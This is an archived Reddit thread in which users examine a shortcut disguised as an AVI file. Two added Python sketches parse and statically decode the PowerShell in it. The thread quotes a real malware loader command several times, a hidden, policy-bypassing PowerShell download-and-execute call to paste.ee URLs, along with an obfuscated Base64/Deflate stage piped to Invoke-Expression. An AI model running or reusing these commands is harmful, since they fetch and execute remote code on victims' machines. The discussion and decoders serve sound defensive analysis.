<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="../../../../../../../../static/css/lato.css">
<link rel="stylesheet" href="../../../../../../../../static/css/bootstrap-superhero.min.css">
<link rel="stylesheet" href="../../../../../../../../static/css/archive.css">
<title>r/Piracy: Ran Across a Shortcut Disguised as an AVI File</title>
</head>
<body>
<main role="main" class="container-fluid">
<div class="submission pt-3" data-id="9o7s0f">
<h3 class="title">Ran Across a Shortcut Disguised as an AVI File</h3>
<p><span class="badge badge-primary">1</span>&nbsp;&nbsp;2018-10-15 by <a class="author" href="../../../../../../../../user/killthealias.html">killthealias</a></p>
<div class="card bg-dark mb-3"><div class="card-body md"><p>Had the following code embedded in it </p>
<p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString(&#39;<a href="https://paste.ee/r/oMFtp/0">https://paste.ee/r/oMFtp/0</a>&#39;);IEX $wcli </p>
<p>Can anyone make sense of it? Should I do anything to protect myself after accidentally running it? </p>
</div></div>
</div>
<div class="comments">
<h5>29 comments</h5>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s29gs">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p>
<div class="md"><p>It&#39;s downloading from <a href="https://paste.ee/r/oMFtp/0">https://paste.ee/r/oMFtp/0</a> and then running whatever it downloads. Didn&#39;t open the link myself as it is going to be malware/virus/etc...</p>
<p>You should probably clean your computer</p>
</div>
</div>
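<p>Added example (not part of the thread and not any poster's code): a Python triage sketch that expands the abbreviated, mixed-case switches in the command line quoted in the post and flags the download-then-execute pattern described in the comment above. The unique-prefix rule, the alias table and the finding labels are assumptions of this sketch and only approximate how powershell.exe resolves its parameters.</p>

```python
import re

# Windows PowerShell host parameters; VALUE lists those that take an argument.
SWITCHES = ["NoExit", "NoLogo", "NonInteractive", "NoProfile", "Sta", "Mta"]
VALUE = ["Command", "ConfigurationName", "EncodedCommand", "ExecutionPolicy", "File",
         "InputFormat", "OutputFormat", "PSConsoleFile", "Version", "WindowStyle"]
ALIASES = {"c": "Command", "e": "EncodedCommand", "ec": "EncodedCommand",
           "ep": "ExecutionPolicy"}
ENUMS = {"WindowStyle": ["Normal", "Hidden", "Minimized", "Maximized"],  # values 0..3
         "ExecutionPolicy": ["Unrestricted", "RemoteSigned", "AllSigned", "Restricted",
                             "Default", "Bypass", "Undefined"]}
# Command line exactly as quoted in the post.
SAMPLE = (r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 "
          r"-eXEc ByP $wcli = ((New-Object System.Net.WebClient))"
          r".DownloadString('https://paste.ee/r/oMFtp/0');IEX $wcli")

def unique_prefix(token, names):
    """Return the single name that token is a case-insensitive prefix of, else None."""
    hits = [n for n in names if n.lower().startswith(token.lower())]
    return hits[0] if len(hits) == 1 else None

def resolve_value(param, raw):
    """Expand an abbreviated or numeric enum value (assumed prefix rule)."""
    names = ENUMS.get(param, [])
    if param == "WindowStyle" and raw.isdigit() and len(names) > int(raw):
        return names[int(raw)]
    return unique_prefix(raw, names) or raw

def analyze(cmdline):
    """Split a powershell.exe command line into resolved parameters and script text."""
    tokens = cmdline.split()
    params, i = {}, 1  # tokens[0] is the executable path
    while len(tokens) > i and tokens[i][0] in "-/":
        key = tokens[i][1:]
        name = ALIASES.get(key.lower()) or unique_prefix(key, SWITCHES + VALUE)
        if name is None:  # unresolved token: treat it as the start of the script
            break
        if name in ("Command", "EncodedCommand", "File"):
            i += 1
            break
        if name in VALUE and len(tokens) > i + 1:
            params[name] = resolve_value(name, tokens[i + 1])
            i += 2
        else:
            params[name] = True
            i += 1
    script = " ".join(tokens[i:])
    checks = [
        ("hidden-window", params.get("WindowStyle") == "Hidden"),
        ("execution-policy-override", params.get("ExecutionPolicy") in ("Bypass", "Unrestricted")),
        ("network-download", bool(re.search(r"download(string|file|data)|invoke-webrequest", script, re.I))),
        ("dynamic-execution", bool(re.search(r"\b(iex|invoke-expression)\b", script, re.I))),
    ]
    return {"params": params, "script": script,
            "findings": [label for label, hit in checks if hit],
            "urls": re.findall(r"https?://[^\s'\")]+", script)}
```

<p>Calling <code>analyze(SAMPLE)</code> resolves the three switches to NoProfile, WindowStyle Hidden and ExecutionPolicy Bypass, and reports the paste URL so it can be blocked or searched for in proxy logs.</p>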
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7tprm2">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/NukeOfTheShadow.html">NukeOfTheShadow</a> 2018-10-15</p>
<div class="md"><p>“Page not found“</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s2uqi">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>You know paste.ee is a pastebin alternative right? It&#39;s just a page full of text. Jeez.</p>
</div>
</div>
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s3jeu">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p>
<div class="md"><blockquote>
<p>It&#39;s just a page full of text. Jeez. Opening the link in your browser won&#39;t do anything</p>
</blockquote>
<p>I never said it was going to do anything.</p>
</div>
</div>
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7s4mj4">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><blockquote>
<p>Didn&#39;t open the link myself as it is going to be malware/virus/etc...</p>
</blockquote>
<p>You are saying the reason you didn&#39;t open the link was because it may be malware. Nothing is wrong with opening the link in a browser. The harmful part would be executing the script in PowerShell.</p>
</div>
</div>
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7s5cxg">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/drifting_on.html">drifting_on</a> 2018-10-15</p>
<div class="md"><p>I was saying I didn&#39;t open the link cause I knew what it most likely was and wasn&#39;t going to analyze its contents. Though I can see how you could interpret what I wrote how you did</p>
</div>
</div>
<div class="comment mb-3 ml-5" data-depth="5" data-id="e7s7114">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>Sorry, I&#39;m just not feeling well today and haven&#39;t slept properly in a few days. I get kinda agitated easily.</p>
</div>
</div>
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s3m9c">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/huckpie.html">huckpie</a> 2018-10-15</p>
<div class="md"><p>From what I can tell, the script downloads that paste to a text file and executes it. The file itself appears to be some obfuscated VBS which as we all know has been used for malicious intent.</p>
</div>
</div>
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7s4fbo">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/Sunny_Cakes.html">Sunny_Cakes</a> 2018-10-15</p>
<div class="md"><p>How would the script execute itself though? Is it meant to be opened with a specific media player that allows for powershell scripts? </p>
</div>
</div>
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7s6rmf">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p>
<div class="md"><p>The shortcut isn&#39;t an AVI file, it&#39;s just a shortcut with .avi in the name of the shortcut.</p>
<p>The shortcut leads to powershell, which is installed on most PCs. It tried to download the raw content of a pastebin, save it as a script, and execute it.</p>
<p>This attack would fail on most systems, because the script would not be signed and most people are on the default security settings for powershell.</p>
</div>
</div>
<div class="comment mb-3 ml-5" data-depth="5" data-id="e7s6w26">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/Sunny_Cakes.html">Sunny_Cakes</a> 2018-10-15</p>
<div class="md"><p>Ah you mean, notavirus.avi.ps1? That&#39;s amateurish, I considered that scenario but honestly didn&#39;t believe people would post about such an obvious attack vector.</p>
</div>
</div>
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7sgxu5">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/rakuanu.html">rakuanu</a> 2018-10-15</p>
<div class="md"><p>It seems the link is dead. I don&#39;t suppose you still have the data for it so I can study it?</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s46mo">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/drzendoom.html">drzendoom</a> 2018-10-15</p>
<div class="md"><p>yeah, i got hit as well, any solutions?</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s4nvq">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>How exactly was it &quot;disguised&quot; as an AVI file?</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s4ttn">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/Halfpipe1234.html">Halfpipe1234</a> 2018-10-15</p>
<div class="md"><p>I&#39;m guessing a streaming site or something</p>
</div>
</div>
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7s73us">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>This would require it to be downloaded and executed though. In that case it would be obvious it&#39;s not an AVI file.</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7s80sx">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p>
<div class="md"><p>Could be placed in a RAR/ZIP that&#39;s been 0-byte padded to look large, then you right click -&gt; extract -&gt; double click it.</p>
</div>
</div>
<div class="comment mb-3 ml-2" data-depth="2" data-id="e7sfq7c">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>But you would see the file extension is not avi after extraction.</p>
</div>
</div>
<div class="comment mb-3 ml-3" data-depth="3" data-id="e7skayx">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/just_another_flogger.html">just_another_flogger</a> 2018-10-15</p>
<div class="md"><p>That is inaccurate.</p>
</div>
</div>
<div class="comment mb-3 ml-4" data-depth="4" data-id="e7ue4oh">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/MediumBarber.html">MediumBarber</a> 2018-10-15</p>
<div class="md"><p>That&#39;s actually exactly how I thought they did it. However if you have file extensions DISABLED normally you would find it weird to see it there. (I always have them enabled.) I also have shortcut arrows removed, so tbh this is the perfect thing to target me, except for the fact that I use MPC-HC as default so I&#39;d notice something wrong with the file icon.</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7s87o3">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/exodus_cl.html">exodus_cl</a> 2018-10-15</p>
<div class="md"><p>an avi file with that string??? could you share more info?</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7uzpu2">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/adr0ckin.html">adr0ckin</a> 2018-10-15</p>
<div class="md"><p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString(&#39;<a href="https://paste.ee/r/aftkm/0">https://paste.ee/r/aftkm/0</a>&#39;);IEX $wcli</p>
<p>here is the <a href="https://paste.ee">paste.ee</a> site.. </p>
<p>( nEW-OBJEcT Io.cOMPRESSIoN.DeFlaTesTrEAM([io.meMoRystREAM] [SysTEM.cOnvErT]::FroMbAsE64sTRINg(&#39;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&#39; ) ,[sYStEm.io.COmPReSsioN.coMPRESSIoNmoDE]::dEcOMpreSS ) |FoREaCH-oBJECT{ nEW-OBJEcT systEM.Io.StREAmReADeR($_ , [teXT.EnCoDIng]::aScIi )}).REaDtOEND( )| inVokE-eXPrESSion </p>
</div>
</div>
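<p>Added example (not part of the thread and not any poster's code): a Python sketch for reading a second stage of the shape shown in the comment above without running it, by undoing the Base64 and DeflateStream layers statically. The function names, the output cap and the harmless sample are constructed for this sketch; the Base64 data from the paste is not present on this page and is not reproduced.</p>

```python
import base64
import re
import zlib

# Matches the quoted literal passed to [Convert]::FromBase64String(...), any letter case.
B64_CALL = re.compile(r"frombase64string\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", re.I)

def decode_stage(script, max_out=1_000_000):
    """Return the text a Base64 + DeflateStream wrapper would pass on, or None."""
    m = B64_CALL.search(script)
    if not m:
        return None
    raw = base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
    # .NET DeflateStream is raw RFC 1951 data with no zlib header, hence wbits=-15.
    d = zlib.decompressobj(wbits=-15)
    out = d.decompress(raw, max_out)  # cap output to guard against decompression bombs
    if d.unconsumed_tail:
        raise ValueError("decoded stage exceeds max_out")
    # The wrapper on the page reads the stream as ASCII.
    return out.decode("ascii", errors="replace")

def unwrap(script, max_depth=5):
    """Peel nested wrappers; returns each recovered layer, outermost first."""
    layers = []
    while len(layers) != max_depth:
        inner = decode_stage(script)
        if inner is None:
            break
        layers.append(inner)
        script = inner
    return layers

def make_constructed_sample(inner):
    """Build a harmless test fragment with the same encoding (constructed data)."""
    c = zlib.compressobj(wbits=-15)
    blob = base64.b64encode(c.compress(inner.encode("ascii")) + c.flush()).decode()
    return "[SysTEM.cOnvErT]::FroMbAsE64sTRINg('" + blob + "' )"

if __name__ == "__main__":
    text = "Write-Output 'constructed second stage'"
    for n, layer in enumerate(unwrap(make_constructed_sample(make_constructed_sample(text)))):
        print(n, layer)
```

<p>The decoded text is only returned for inspection; nothing in the sketch evaluates it.</p>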
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sb1s9">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/RobinsonDickinson.html">RobinsonDickinson</a> 2018-10-15</p>
<div class="md"><p>so how did u get it in the first place? a file just doesn&#39;t randomly download itself..</p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7sh0n5">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/CaineBK.html">CaineBK</a> 2018-10-15</p>
<div class="md"><p>Relevant flair. </p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sfol5">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/rakuanu.html">rakuanu</a> 2018-10-15</p>
<div class="md"><p>I&#39;m not expert by many means but it seems that the page it tries to retrieve data from has been removed by the website itself so I would imagine that its intended payload was never retrieved thus... a dead malware file? I could be totally wrong though. </p>
</div>
</div>
<div class="comment mb-3 ml-1" data-depth="1" data-id="e7sjtom">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/waSItaSdm.html">waSItaSdm</a> 2018-10-15</p>
<div class="md"><p>Yes, the link is dead so there&#39;s no string to download and execute. Got lucky this time.</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7sxtfw">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/streamingisretarded.html">streamingisretarded</a> 2018-10-15</p>
<div class="md"><p>that&#39;ll learn ya for downloading crazy rich asians</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7t7jbf">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/EqualityOfAutonomy.html">EqualityOfAutonomy</a> 2018-10-15</p>
<div class="md"><p>Since that page is 404 you may have been lucky and it didn&#39;t work as intended.</p>
</div>
</div>
<div class="comment mb-3 ml-0" data-depth="0" data-id="e7uzg3l">
<p class="byline text-muted mb-0"><a href="javascript:;" class="score"><span class="badge badge-secondary">1</span></a>&nbsp;&nbsp;<a class="author" href="../../../../../../../../user/adr0ckin.html">adr0ckin</a> 2018-10-15</p>
<div class="md"><p>Here is the script i got..</p>
<p>C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString(&#39;<a href="https://paste.ee/r/aftkm/0">https://paste.ee/r/aftkm/0</a>&#39;);IEX $wcli</p>
</div>
</div>
</div>
</main>
<footer class="container-fluid">
<a class="to-top mt-1 mb-1 btn btn-lg btn-primary" href="#top">top of page</a>
<p class="small mb-0">data archived 2018-10-15. <a href="https://github.com/libertysoft3/reddit-html-archiver">source code</a>.</p>
</footer>
<script src="../../../../../../../../static/js/jquery-3.3.1.slim.min.js"></script>
<script src="../../../../../../../../static/js/bootstrap.min.js"></script>
<script src="../../../../../../../../static/js/archive-comments.js"></script>
</body>